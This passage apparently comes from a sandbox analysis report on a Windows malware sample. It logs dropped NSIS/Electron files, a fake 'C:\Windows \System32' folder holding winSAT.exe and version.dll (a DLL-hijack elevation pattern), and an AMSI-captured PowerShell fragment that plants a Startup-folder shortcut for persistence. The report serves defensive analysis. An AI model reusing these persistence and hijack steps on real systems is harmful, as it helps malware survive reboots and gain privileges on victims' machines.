Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .00cfg
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .gxfg
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .retplne
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: _RDATA
Source: aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll.37.drStatic PE information: section name: .00cfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: version.dll.10.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .text entropy: 6.826347079300051
Source: 039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll.10.drStatic PE information: section name: .text entropy: 7.098417691970752
Source: version.dll0.10.drStatic PE information: section name: .text entropy: 7.098417691970752
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll.37.drStatic PE information: section name: .text entropy: 7.098417691970752

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeExecutable created and started: C:\Windows \System32\winSAT.exe
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\winSAT.exeJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\NSIS.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Roaming\MyElectronApp\version.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\55211371-e4e4-4315-9751-4ed29e5502da.tmp.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\8e6f904c-93b6-4e7c-b442-119a15f71127.tmp.exeJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\version.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Users\user\AppData\Local\Temp\aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\winSAT.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeFile created: C:\Windows \System32\version.dllJump to dropped file
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeFile created: C:\Users\user\AppData\Local\Programs\NSIS\LICENSE.electron.txtJump to behavior

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk');$s.TargetPath='C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe';$s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyElectronApp.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
